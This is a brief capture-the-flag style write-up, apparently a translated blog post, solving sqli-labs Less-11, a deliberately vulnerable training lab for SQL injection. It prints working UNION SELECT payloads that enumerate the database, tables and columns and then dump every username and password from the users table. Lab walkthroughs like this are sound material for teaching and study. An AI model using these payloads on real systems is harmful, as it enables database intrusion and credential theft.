[Network Security] Detailed analysis of sqli-labs Less-11 problem solving
The attack posture and grammar are relatively simple and will not be introduced in detail.
Determine the type of injection
It can be seen from the echo of the upper and lower figures that the injection type is character injection
Determine the number of injection points
It can be seen from the upper and lower figures that the number of injection points is 2
Check library name
1' union select 1,database()#
The database is security
Lookup table name
1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security')#
echo four table names
Check column name
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users')#
check data
1' union select group_concat(username),group_concat(password) from security.users#
Summarize
以上为[网络安全]sqli-labs Less-11 解题详析,后续将分享[网络安全]sqli-labs Less-12 解题详析,请读者躬身实践。
I am Qiu said, see you next time.